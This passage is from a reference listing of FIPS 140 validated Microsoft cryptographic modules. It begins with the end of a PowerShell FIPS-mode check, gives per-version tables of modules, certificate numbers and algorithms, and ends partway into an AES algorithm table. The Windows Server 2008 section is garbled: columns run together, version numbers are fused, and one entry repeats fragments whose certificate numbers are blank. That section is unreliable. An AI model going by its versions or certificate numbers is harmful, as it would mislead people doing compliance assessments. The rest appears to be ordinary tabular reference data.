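    'FIPS algorithm policy: NOT enabled; validated binaries alone do not put the system in FIPS mode'
}
```

Run it in an elevated PowerShell session on the host being assessed. To apply the same check to another row of these tables, swap `$ValidatedBuild` and the module list for that operating system's entries; where a row lists several versions, compare against each of them in turn rather than against the build alone.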

Windows Server 2012 R2

Validated Editions: Server, Storage Server, StorSimple 8000 Series, Azure StorSimple Virtual Array Windows Server 2012 R2

Cryptographic Module: Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll)
Version (link to Security Policy): 6.3.9600, 6.3.9600.17031
FIPS Certificate #: 2357
FIPS Approved algorithms: AES (Cert. #2832); DRBG (Certs. #489); DSA (Cert. #855); ECDSA (Cert. #505); HMAC (Cert. #1773); KAS (Cert. #47); KBKDF (Cert. #30); PBKDF (vendor affirmed); RSA (Certs. #1487, #1493 and #1519); SHS (Cert. #2373); Triple-DES (Cert. #1692)
Other algorithms: AES (Cert. #2832, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); AES-GCM encryption (non-compliant); DES; HMAC MD5; Legacy CAPI KDF; MD2; MD4; MD5; NDRNG; RC2; RC4; RSA (encrypt/decrypt)

Cryptographic Module: Kernel Mode Cryptographic Primitives Library (cng.sys)
Version (link to Security Policy): 6.3.9600, 6.3.9600.17042
FIPS Certificate #: 2356
FIPS Approved algorithms: AES (Cert. #2832); DRBG (Certs. #489); ECDSA (Cert. #505); HMAC (Cert. #1773); KAS (Cert. #47); KBKDF (Cert. #30); PBKDF (vendor affirmed); RSA (Certs. #1487, #1493 and #1519); SHS (Cert. #2373); Triple-DES (Cert. #1692)
Other algorithms: AES (Cert. #2832, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); AES-GCM encryption (non-compliant); DES; HMAC MD5; Legacy CAPI KDF; MD2; MD4; MD5; NDRNG; RC2; RC4; RSA (encrypt/decrypt)

Cryptographic Module: Boot Manager
Version (link to Security Policy): 6.3.9600, 6.3.9600.17031
FIPS Certificate #: 2351
FIPS Approved algorithms: AES (Cert. #2832); HMAC (Cert. #1773); PBKDF (vendor affirmed); RSA (Cert. #1494); SHS (Certs. #2373 and #2396)
Other algorithms: MD5; KDF (non-compliant); PBKDF (non-compliant)

Cryptographic Module: BitLocker® Windows OS Loader (winload)
Version (link to Security Policy): 6.3.9600, 6.3.9600.17031
FIPS Certificate #: 2352
FIPS Approved algorithms: AES (Cert. #2832); RSA (Cert. #1494); SHS (Cert. #2396)
Other algorithms: MD5; NDRNG

Cryptographic Module: BitLocker® Windows Resume (winresume) [16]
Version (link to Security Policy): 6.3.9600, 6.3.9600.17031
FIPS Certificate #: 2353
FIPS Approved algorithms: AES (Cert. #2832); RSA (Cert. #1494); SHS (Certs. #2373 and #2396)
Other algorithms: MD5

Cryptographic Module: BitLocker® Dump Filter (dumpfve.sys) [17]
Version (link to Security Policy): 6.3.9600, 6.3.9600.17031
FIPS Certificate #: 2354
FIPS Approved algorithms: AES (Cert. #2832)
Other algorithms: N/A

Cryptographic Module: Code Integrity (ci.dll)
Version (link to Security Policy): 6.3.9600, 6.3.9600.17031
FIPS Certificate #: 2355
FIPS Approved algorithms: RSA (Cert. #1494); SHS (Cert. #2373)
Other algorithms: MD5

[16] Does not apply to Azure StorSimple Virtual Array Windows Server 2012 R2
[17] Does not apply to Azure StorSimple Virtual Array Windows Server 2012 R2
Windows Server 2012
Validated Editions: Server, Storage Server

Cryptographic Module: Cryptographic Primitives Library (BCRYPTPRIMITIVES.DLL)
Version (link to Security Policy): 6.2.9200
FIPS Certificate #: 1892
FIPS Approved algorithms: AES (Certs. #2197 and #2216); DRBG (Certs. #258); DSA (Cert. #687); ECDSA (Cert. #341); HMAC (Cert. #1345); KAS (Cert. #36); KBKDF (Cert. #3); PBKDF (vendor affirmed); RSA (Certs. #1133 and #1134); SHS (Cert. #1903); Triple-DES (Cert. #1387)
Other algorithms: AES (Cert. #2197, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); DES; Legacy CAPI KDF; MD2; MD4; MD5; HMAC MD5; RC2; RC4; RSA (encrypt/decrypt)

Cryptographic Module: Kernel Mode Cryptographic Primitives Library (cng.sys)
Version (link to Security Policy): 6.2.9200
FIPS Certificate #: 1891
FIPS Approved algorithms: AES (Certs. #2197 and #2216); DRBG (Certs. #258 and #259); ECDSA (Cert. #341); HMAC (Cert. #1345); KAS (Cert. #36); KBKDF (Cert. #3); PBKDF (vendor affirmed); RNG (Cert. #1110); RSA (Certs. #1133 and #1134); SHS (Cert. #1903); Triple-DES (Cert. #1387)
Other algorithms: AES (Cert. #2197, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); DES; Legacy CAPI KDF; MD2; MD4; MD5; HMAC MD5; RC2; RC4; RSA (encrypt/decrypt)

Cryptographic Module: Boot Manager
Version (link to Security Policy): 6.2.9200
FIPS Certificate #: 1895
FIPS Approved algorithms: AES (Certs. #2196 and #2198); HMAC (Cert. #1347); RSA (Cert. #1132); SHS (Cert. #1903)
Other algorithms: MD5

Cryptographic Module: BitLocker® Windows OS Loader (WINLOAD)
Version (link to Security Policy): 6.2.9200
FIPS Certificate #: 1896
FIPS Approved algorithms: AES (Certs. #2196 and #2198); RSA (Cert. #1132); SHS (Cert. #1903)
Other algorithms: AES (Cert. #2197; non-compliant); MD5; Non-Approved RNG

Cryptographic Module: BitLocker® Windows Resume (WINRESUME)
Version (link to Security Policy): 6.2.9200
FIPS Certificate #: 1898
FIPS Approved algorithms: AES (Certs. #2196 and #2198); RSA (Cert. #1132); SHS (Cert. #1903)
Other algorithms: MD5

Cryptographic Module: BitLocker® Dump Filter (DUMPFVE.SYS)
Version (link to Security Policy): 6.2.9200
FIPS Certificate #: 1899
FIPS Approved algorithms: AES (Certs. #2196 and #2198)
Other algorithms: N/A

Cryptographic Module: Code Integrity (CI.DLL)
Version (link to Security Policy): 6.2.9200
FIPS Certificate #: 1897
FIPS Approved algorithms: RSA (Cert. #1132); SHS (Cert. #1903)
Other algorithms: MD5

Cryptographic Module: Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH.DLL)
Version (link to Security Policy): 6.2.9200
FIPS Certificate #: 1893
FIPS Approved algorithms: DSA (Cert. #686); SHS (Cert. #1902); Triple-DES (Cert. #1386); Triple-DES MAC (Triple-DES Cert. #1386, vendor affirmed)
Other algorithms: DES; DES MAC; DES40; DES40 MAC; Diffie-Hellman; MD5; RC2; RC2 MAC; RC4; Triple-DES (Cert. #1386, key wrapping; key establishment methodology provides 112 bits of encryption strength; non-compliant less than 112 bits of encryption strength)

Cryptographic Module: Enhanced Cryptographic Provider (RSAENH.DLL)
Version (link to Security Policy): 6.2.9200
FIPS Certificate #: 1894
FIPS Approved algorithms: AES (Cert. #2196); HMAC (Cert. #1346); RSA (Cert. #1132); SHS (Cert. #1902); Triple-DES (Cert. #1386)
Other algorithms: AES (Cert. #2196, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); DES; MD2; MD4; MD5; RC2; RC4; RSA (key wrapping; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength); Triple-DES (Cert. #1386, key wrapping; key establishment methodology provides 112 bits of encryption strength; non-compliant less than 112 bits of encryption strength)

Windows Server 2008 R2

Cryptographic Module: Boot Manager (bootmgr)
Version (link to Security Policy): 6.1.7600.16385 or 6.1.7601.17514
FIPS Certificate #: 1321
FIPS Approved algorithms: AES (Certs. #1168 and #1177); HMAC (Cert. #675); RSA (Cert. #568); SHS (Cert. #1081)
Other algorithms: MD5

Cryptographic Module: Winload OS Loader (winload.exe)
Version (link to Security Policy): 6.1.7600.16385, 6.1.7600.16757, 6.1.7600.20897, 6.1.7600.20916, 6.1.7601.17514, 6.1.7601.17556, 6.1.7601.21655 and 6.1.7601.21675
FIPS Certificate #: 1333
FIPS Approved algorithms: AES (Certs. #1168 and #1177); RSA (Cert. #568); SHS (Cert. #1081)
Other algorithms: MD5

Cryptographic Module: Code Integrity (ci.dll)
Version (link to Security Policy): 6.1.7600.16385, 6.1.7600.17122, 6.1.7600.21320, 6.1.7601.17514, 6.1.7601.17950 and 6.1.7601.22108
FIPS Certificate #: 1334
FIPS Approved algorithms: RSA (Cert. #568); SHS (Cert. #1081)
Other algorithms: MD5

Cryptographic Module: Kernel Mode Cryptographic Primitives Library (cng.sys)
Version (link to Security Policy): 6.1.7600.16385, 6.1.7600.16915, 6.1.7600.21092, 6.1.7601.17514, 6.1.7601.17919, 6.1.7601.17725, 6.1.7601.21861 and 6.1.7601.22076
FIPS Certificate #: 1335
FIPS Approved algorithms: AES (Certs. #1168 and #1177); AES GCM (Cert. #1168, vendor-affirmed); AES GMAC (Cert. #1168, vendor-affirmed); DRBG (Certs. #23 and #27); ECDSA (Cert. #142); HMAC (Cert. #686); KAS (SP 800-56A, vendor affirmed, key agreement; key establishment methodology provides between 80 and 256 bits of encryption strength); RNG (Cert. #649); RSA (Certs. #559 and #567); SHS (Cert. #1081); Triple-DES (Cert. #846)
Other algorithms: AES (Cert. #1168, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); DES; Diffie-Hellman (key agreement; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength); MD2; MD4; MD5; HMAC MD5; RC2; RC4

Cryptographic Module: Cryptographic Primitives Library (bcryptprimitives.dll)
Version (link to Security Policy): 6.1.7600.16385 or 6.1.7601.17514
FIPS Certificate #: 1336
FIPS Approved algorithms: AES (Certs. #1168 and #1177); AES GCM (Cert. #1168, vendor-affirmed); AES GMAC (Cert. #1168, vendor-affirmed); DRBG (Certs. #23 and #27); DSA (Cert. #391); ECDSA (Cert. #142); HMAC (Cert. #686); KAS (SP 800-56A, vendor affirmed, key agreement; key establishment methodology provides between 80 and 256 bits of encryption strength); RNG (Cert. #649); RSA (Certs. #559 and #567); SHS (Cert. #1081); Triple-DES (Cert. #846)
Other algorithms: AES (Cert. #1168, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); DES; HMAC MD5; MD2; MD4; MD5; RC2; RC4

Cryptographic Module: Enhanced Cryptographic Provider (RSAENH)
Version (link to Security Policy): 6.1.7600.16385
FIPS Certificate #: 1337
FIPS Approved algorithms: AES (Cert. #1168); DRBG (Cert. #23); HMAC (Cert. #687); SHS (Cert. #1081); RSA (Certs. #559 and #568); Triple-DES (Cert. #846)
Other algorithms: DES; MD2; MD4; MD5; RC2; RC4; RSA (key wrapping; key establishment methodology provides between 112 and 256 bits of encryption strength; non-compliant less than 112 bits of encryption strength)

Cryptographic Module: Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH)
Version (link to Security Policy): 6.1.7600.16385
FIPS Certificate #: 1338
FIPS Approved algorithms: DSA (Cert. #390); RNG (Cert. #649); SHS (Cert. #1081); Triple-DES (Cert. #846); Triple-DES MAC (Triple-DES Cert. #846, vendor affirmed)
Other algorithms: DES; DES MAC; DES40; DES40 MAC; Diffie-Hellman; MD5; RC2; RC2 MAC; RC4

Cryptographic Module: BitLocker™ Drive Encryption
Version (link to Security Policy): 6.1.7600.16385, 6.1.7600.16429, 6.1.7600.16757, 6.1.7600.20536, 6.1.7600.20873, 6.1.7600.20897, 6.1.7600.20916, 6.1.7601.17514, 6.1.7601.17556, 6.1.7601.21634, 6.1.7601.21655 or 6.1.7601.21675
FIPS Certificate #: 1339
FIPS Approved algorithms: AES (Certs. #1168 and #1177); HMAC (Cert. #675); SHS (Cert. #1081)
Other algorithms: Elephant Diffuser

W i n d o w s Se r v e r 2 0 0 8

Cryptographic Module Version (link to Security FIPS Certificate # Algorithms


Policy)
Boot Manager (bootmgr) 6.0.6001.18000, 1004 FIPS Approved algorithms:
6.0.6002.18005 and AES (Certs. #739 and #760);
6.0.6002.224976.0.6001.18 HMAC (Cert. #415); RSA
000, 6.0.6002.18005 and (Cert. #355); SHS (Cert.
6.0.6002.22497 #753)

Other algorithms: N/A

Winload OS Loader 6.0.6001.18000, 1005 FIPS Approved algorithms:


(winload.exe) 6.0.6001.18606, AES (Certs. #739 and #760);
6.0.6001.22861, RSA (Cert. #355); SHS (Cert.
6.0.6002.18005, #753)
6.0.6002.18411,
6.0.6002.22497 and Other algorithms: MD5
6.0.6002.225966.0.6001.18
000, 6.0.6001.18606,
6.0.6001.22861,
6.0.6002.18005,
6.0.6002.18411,
6.0.6002.22497 and
6.0.6002.22596

Code Integrity (ci.dll) 6.0.6001.18000 and 1006 FIPS Approved algorithms:


6.0.6002.180056.0.6001.18 RSA (Cert. #355); SHS (Cert.
000 and 6.0.6002.18005 #753)

Other algorithms: MD5

Kernel Mode Security 6.0.6001.18709, 1007 FIPS Approved algorithms:


Support Provider Interface 6.0.6001.18272, AES (Certs. #739 and #757);
(ksecdd.sys) 6.0.6001.18796, ECDSA (Cert. #83); HMAC
6.0.6001.22202, (Cert. #413); RNG (Cert.
6.0.6001.22450, #435 and SP800-90 AES-
6.0.6001.22987, CTR, vendor affirmed); RSA
6.0.6001.23069, (Certs. #353 and #358); SHS
6.0.6002.18005, (Cert. #753); Triple-DES
6.0.6002.18051, (Cert. #656)
6.0.6002.18541,
6.0.6002.18643, Other algorithms: AES (GCM
6.0.6002.22152, and GMAC; non-compliant);
6.0.6002.22742 and DES; Diffie-Hellman (key
6.0.6002.228696.0.6001.18 agreement; key
709, 6.0.6001.18272, establishment methodology
6.0.6001.18796, provides between 112 and
6.0.6001.22202, 150 bits of encryption
6.0.6001.22450, strength; non-compliant less
6.0.6001.22987, than 112 bits of encryption
6.0.6001.23069, strength); EC Diffie-Hellman
6.0.6002.18005, (key agreement; key
6.0.6002.18051, establishment methodology
6.0.6002.18541, provides between 128 and
6.0.6002.18643, 256 bits of encryption
6.0.6002.22152, strength); MD2; MD4; MD5;
6.0.6002.22742 and HMAC MD5; RC2; RC4; RNG
6.0.6002.22869 (SP 800-90 Dual-EC; non-
compliant); RSA (key
wrapping: key establishment
methodology provides
between 112 and 150 bits of
encryption strength; non-
compliant less than 112 bits
of encryption strength)#83);
HMAC (Cert. ); RNG (Cert.
and SP800-90 AES-CTR,
vendor affirmed); RSA (Certs.
and ); SHS (Cert. ); Triple-DES
(Cert. )

Other algorithms: AES (GCM


and GMAC; non-compliant);
DES; Diffie-Hellman (key
agreement; key
establishment methodology
provides between 112 and
150 bits of encryption
strength; non-compliant less
than 112 bits of encryption
strength); EC Diffie-Hellman
(key agreement; key
establishment methodology
provides between 128 and
256 bits of encryption
strength); MD2; MD4; MD5;
HMAC MD5; RC2; RC4; RNG
(SP 800-90 Dual-EC; non-
compliant); RSA (key
wrapping: key establishment
methodology provides
between 112 and 150 bits of
encryption strength; non-
compliant less than 112 bits
of encryption strength)

Cryptographic Primitives 6.0.6001.22202, 1008 FIPS Approved algorithms:


Library (bcrypt.dll) 6.0.6002.18005 and AES (Certs. #739 and #757);
6.0.6002.228726.0.6001.22 DSA (Cert. #284); ECDSA
202, 6.0.6002.18005 and (Cert. #83); HMAC (Cert.
6.0.6002.22872 #413); RNG (Cert. #435 and
SP800-90, vendor affirmed);
RSA (Certs. #353 and #358);
SHS (Cert. #753); Triple-DES
(Cert. #656)

Other algorithms: AES (GCM


and GMAC; non-compliant);
DES; Diffie-Hellman (key
agreement; key
establishment methodology
provides between 112 and
150 bits of encryption
strength; non-compliant less
than 112 bits of encryption
strength); EC Diffie-Hellman
(key agreement; key
establishment methodology
provides between 128 and
256 bits of encryption
strength); MD2; MD4; MD5;
RC2; RC4; RNG (SP 800-90
Dual-EC; non-compliant);
RSA (key wrapping; key
establishment methodology
provides between 112 and
150 bits of encryption
strength; non-compliant
provides less than 112 bits
of encryption strength)
Cryptographic Module: Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH)
Version (link to Security Policy): 6.0.6001.18000 and 6.0.6002.18005
FIPS Certificate #: 1009
FIPS Approved algorithms: DSA (Cert. #282); RNG (Cert. #435); SHS (Cert. #753); Triple-DES (Cert. #656); Triple-DES MAC (Triple-DES Cert. #656, vendor affirmed)
Other algorithms: DES; DES MAC; DES40; DES40 MAC; Diffie-Hellman (key agreement; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength); MD5; RC2; RC2 MAC; RC4

Cryptographic Module: Enhanced Cryptographic Provider (RSAENH)
Version (link to Security Policy): 6.0.6001.22202 and 6.0.6002.18005
FIPS Certificate #: 1010
FIPS Approved algorithms: AES (Cert. #739); HMAC (Cert. #408); RNG (SP 800-90, vendor affirmed); RSA (Certs. #353 and #355); SHS (Cert. #753); Triple-DES (Cert. #656)
Other algorithms: DES; MD2; MD4; MD5; RC2; RC4; RSA (key wrapping; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength)

Windows Server 2003 SP2

Cryptographic Module: Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH)
Version (link to Security Policy): 5.2.3790.3959
FIPS Certificate #: 875
FIPS Approved algorithms: DSA (Cert. #221); RNG (Cert. #314); RSA (Cert. #245); SHS (Cert. #611); Triple-DES (Cert. #543)
Other algorithms: DES; DES40; Diffie-Hellman (key agreement; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength); MD5; RC2; RC4

Cryptographic Module: Kernel Mode Cryptographic Module (FIPS.SYS)
Version (link to Security Policy): 5.2.3790.3959
FIPS Certificate #: 869
FIPS Approved algorithms: HMAC (Cert. #287); RNG (Cert. #313); SHS (Cert. #610); Triple-DES (Cert. #542)
Other algorithms: DES; HMAC-MD5

Cryptographic Module: Enhanced Cryptographic Provider (RSAENH)
Version (link to Security Policy): 5.2.3790.3959
FIPS Certificate #: 868
FIPS Approved algorithms: AES (Cert. #548); HMAC (Cert. #289); RNG (Cert. #316); RSA (Cert. #245); SHS (Cert. #613); Triple-DES (Cert. #544)
Other algorithms: DES; RC2; RC4; MD2; MD4; MD5; RSA (key wrapping; key establishment methodology provides between 112 and 256 bits of encryption strength; non-compliant less than 112 bits of encryption strength)

Windows Server 2003 SP1

Cryptographic Module: Kernel Mode Cryptographic Module (FIPS.SYS)
Version (link to Security Policy): 5.2.3790.1830 [SP1]
FIPS Certificate #: 405
FIPS Approved algorithms: Triple-DES (Certs. #201[1] and #370[1]); SHS (Certs. #177[1] and #371[2])
Other algorithms: DES (Cert. #230[1]); HMAC-MD5; HMAC-SHA-1 (non-compliant)
[1] x86
[2] SP1 x86, x64, IA64

Cryptographic Module: Enhanced Cryptographic Provider (RSAENH)
Version (link to Security Policy): 5.2.3790.1830 [Service Pack 1]
FIPS Certificate #: 382
FIPS Approved algorithms: Triple-DES (Cert. #192[1] and #365[2]); AES (Certs. #80[1] and #290[2]); SHS (Cert. #176[1] and #364[2]); HMAC (Cert. #176, vendor affirmed[1] and #99[2]); RSA (PKCS#1, vendor affirmed[1] and #81[2])
Other algorithms: DES (Cert. #226[1]); SHA-256[1]; SHA-384[1]; SHA-512[1]; RC2; RC4; MD2; MD4; MD5
[1] x86
[2] SP1 x86, x64, IA64

Cryptographic Module: Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH)
Version (link to Security Policy): 5.2.3790.1830 [Service Pack 1]
FIPS Certificate #: 381
FIPS Approved algorithms: Triple-DES (Certs. #199[1] and #381[2]); SHA-1 (Certs. #181[1] and #385[2]); DSA (Certs. #95[1] and #146[2]); RSA (Cert. #81)
Other algorithms: DES (Cert. #229[1]); Diffie-Hellman (key agreement); RC2; RC4; MD5; DES 40
[1] x86
[2] SP1 x86, x64, IA64

Windows Server 2003

Cryptographic Module: Kernel Mode Cryptographic Module (FIPS.SYS)
Version (link to Security Policy): 5.2.3790.0
FIPS Certificate #: 405
FIPS Approved algorithms: Triple-DES (Certs. #201[1] and #370[1]); SHS (Certs. #177[1] and #371[2])
Other algorithms: DES (Cert. #230[1]); HMAC-MD5; HMAC-SHA-1 (non-compliant)
[1] x86
[2] SP1 x86, x64, IA64

Cryptographic Module: Enhanced Cryptographic Provider (RSAENH)
Version (link to Security Policy): 5.2.3790.0
FIPS Certificate #: 382
FIPS Approved algorithms: Triple-DES (Cert. #192[1] and #365[2]); AES (Certs. #80[1] and #290[2]); SHS (Cert. #176[1] and #364[2]); HMAC (Cert. #176, vendor affirmed[1] and #99[2]); RSA (PKCS#1, vendor affirmed[1] and #81[2])
Other algorithms: DES (Cert. #226[1]); SHA-256[1]; SHA-384[1]; SHA-512[1]; RC2; RC4; MD2; MD4; MD5
[1] x86
[2] SP1 x86, x64, IA64

Cryptographic Module: Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH)
Version (link to Security Policy): 5.2.3790.0
FIPS Certificate #: 381
FIPS Approved algorithms: Triple-DES (Certs. #199[1] and #381[2]); SHA-1 (Certs. #181[1] and #385[2]); DSA (Certs. #95[1] and #146[2]); RSA (Cert. #81)
Other algorithms: DES (Cert. #229[1]); Diffie-Hellman (key agreement); RC2; RC4; MD5; DES 40
[1] x86
[2] SP1 x86, x64, IA64

Other Products

Windows Embedded Compact 7 and Windows Embedded Compact 8

Cryptographic Module: Enhanced Cryptographic Provider
Version (link to Security Policy): 7.00.2872 [1] and 8.00.6246 [2]
FIPS Certificate #: 2957
FIPS Approved algorithms: AES (Certs. #4433 and #4434); CKG (vendor affirmed); DRBG (Certs. #1432 and #1433); HMAC (Certs. #2946 and #2945); RSA (Certs. #2414 and #2415); SHS (Certs. #3651 and #3652); Triple-DES (Certs. #2383 and #2384)
Allowed algorithms: HMAC-MD5; MD5; NDRNG

Cryptographic Module: Cryptographic Primitives Library (bcrypt.dll)
Version (link to Security Policy): 7.00.2872 [1] and 8.00.6246 [2]
FIPS Certificate #: 2956
FIPS Approved algorithms: AES (Certs. #4430 and #4431); CKG (vendor affirmed); CVL (Certs. #1139 and #1140); DRBG (Certs. #1429 and #1430); DSA (Certs. #1187 and #1188); ECDSA (Certs. #1072 and #1073); HMAC (Certs. #2942 and #2943); KAS (Certs. #114 and #115); RSA (Certs. #2411 and #2412); SHS (Certs. #3648 and #3649); Triple-DES (Certs. #2381 and #2382)
Allowed algorithms: MD5; NDRNG; RSA (key wrapping; key establishment methodology provides between 112 and 150 bits of encryption strength)

Windows CE 6.0 and Windows Embedded Compact 7

Cryptographic Module: Enhanced Cryptographic Provider
Version (link to Security Policy): 6.00.1937 [1] and 7.00.1687 [2]
FIPS Certificate #: 825
FIPS Approved algorithms: AES (Certs. #516 [1] and #2024 [2]); HMAC (Certs. #267 [1] and #1227 [2]); RNG (Certs. #292 [1] and #1060 [2]); RSA (Cert. #230 [1] and #1052 [2]); SHS (Certs. #589 [1] and #1774 [2]); Triple-DES (Certs. #526 [1] and #1308 [2])
Other algorithms: MD5; HMAC-MD5; RC2; RC4; DES

Outlook Cryptographic Provider

Cryptographic Module: Outlook Cryptographic Provider (EXCHCSP)
Version (link to Security Policy): SR-1A (3821)
FIPS Certificate #: 110
FIPS Approved algorithms: Triple-DES (Cert. #18); SHA-1 (Certs. #32); RSA (vendor affirmed)
Other algorithms: DES (Certs. #91); DES MAC; RC2; MD2; MD5

Cryptographic Algorithms
The following tables are organized by cryptographic algorithm, listing each implementation's modes, states, and key sizes. For each algorithm implementation (operating system / platform), there is a link to the certificate issued by the Cryptographic Algorithm Validation Program (CAVP).
Advanced Encryption Standard (AES)

Algorithm Implementation and Certificate #: Microsoft Surface Hub Virtual TPM Implementations #4904
Version: 10.0.15063.674
Modes / States / Key Sizes:
  AES-CBC: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CFB128: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CTR: Counter Source: Internal; Key Lengths: 128, 192, 256 (bits)
  AES-OFB: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)

Algorithm Implementation and Certificate #: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); Virtual TPM Implementations #4903
Version: 10.0.16299
Modes / States / Key Sizes:
  AES-CBC: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CFB128: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CTR: Counter Source: Internal; Key Lengths: 128, 192, 256 (bits)
  AES-OFB: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)

Algorithm Implementation and Certificate #: Microsoft Surface Hub SymCrypt Cryptographic Implementations #4902
Version: 10.0.15063.674
Modes / States / Key Sizes:
  AES-CBC: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CCM: Key Lengths: 128, 192, 256 (bits); Tag Lengths: 32, 48, 64, 80, 96, 112, 128 (bits); IV Lengths: 56, 64, 72, 80, 88, 96, 104 (bits); Plain Text Length: 0-32; AAD Length: 0-65536
  AES-CFB128: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CFB8: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CMAC:
    Generation:
      AES-128: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
      AES-192: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
      AES-256: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
    Verification:
      AES-128: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
      AES-192: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
      AES-256: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
  AES-CTR: Counter Source: Internal; Key Lengths: 128, 192, 256 (bits)
  AES-ECB: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-GCM: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits); Tag Lengths: 96, 104, 112, 120, 128 (bits); Plain Text Lengths: 0, 8, 1016, 1024 (bits); AAD Lengths: 0, 8, 1016, 1024 (bits); 96 bit IV supported
  AES-XTS:
    Key Size: 128: Modes: Decrypt, Encrypt; Block Sizes: Full
    Key Size: 256: Modes: Decrypt, Encrypt; Block Sizes: Full

Algorithm Implementation and Certificate #: Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #4901
Version: 10.0.15254
Modes / States / Key Sizes:
  AES-CBC: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CCM: Key Lengths: 128, 192, 256 (bits); Tag Lengths: 32, 48, 64, 80, 96, 112, 128 (bits); IV Lengths: 56, 64, 72, 80, 88, 96, 104 (bits); Plain Text Length: 0-32; AAD Length: 0-65536
  AES-CFB128: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CFB8: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CMAC:
    Generation:
      AES-128: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
      AES-192: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
      AES-256: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
    Verification:
      AES-128: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
      AES-192: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
      AES-256: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
  AES-CTR: Counter Source: Internal; Key Lengths: 128, 192, 256 (bits)
  AES-ECB: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-GCM: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits); Tag Lengths: 96, 104, 112, 120, 128 (bits); Plain Text Lengths: 0, 8, 1016, 1024 (bits); AAD Lengths: 0, 8, 1016, 1024 (bits); 96 bit IV supported
  AES-XTS:
    Key Size: 128: Modes: Decrypt, Encrypt; Block Sizes: Full
    Key Size: 256: Modes: Decrypt, Encrypt; Block Sizes: Full

Algorithm Implementation and Certificate #: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #4897
Version: 10.0.16299
Modes / States / Key Sizes:
  AES-CBC: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CCM: Key Lengths: 128, 192, 256 (bits); Tag Lengths: 32, 48, 64, 80, 96, 112, 128 (bits); IV Lengths: 56, 64, 72, 80, 88, 96, 104 (bits); Plain Text Length: 0-32; AAD Length: 0-65536
  AES-CFB128: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CFB8: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-CMAC:
    Generation:
      AES-128: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
      AES-192: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
      AES-256: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
    Verification:
      AES-128: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
      AES-192: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
      AES-256: Block Sizes: Full, Partial; Message Length: 0-65536; Tag Length: 16-16
  AES-CTR: Counter Source: Internal; Key Lengths: 128, 192, 256 (bits)
  AES-ECB: Modes: Decrypt, Encrypt; Key Lengths: 128, 192, 256 (bits)
  AES-GCM: Modes: Decrypt, Encrypt; IV Generation: External; Key Lengths: 128, 192, 256 (bits); Tag Lengths: 96, 104, 112, 120, 128 (bits); Plain Text Lengths: 0, 8, 1016, 1024 (bits); AAD Lengths: 0, 8, 1016, 1024 (bits); 96 bit IV supported
  AES-XTS:
    Key Size: 128: Modes: Decrypt, Encrypt; Block Sizes: Full
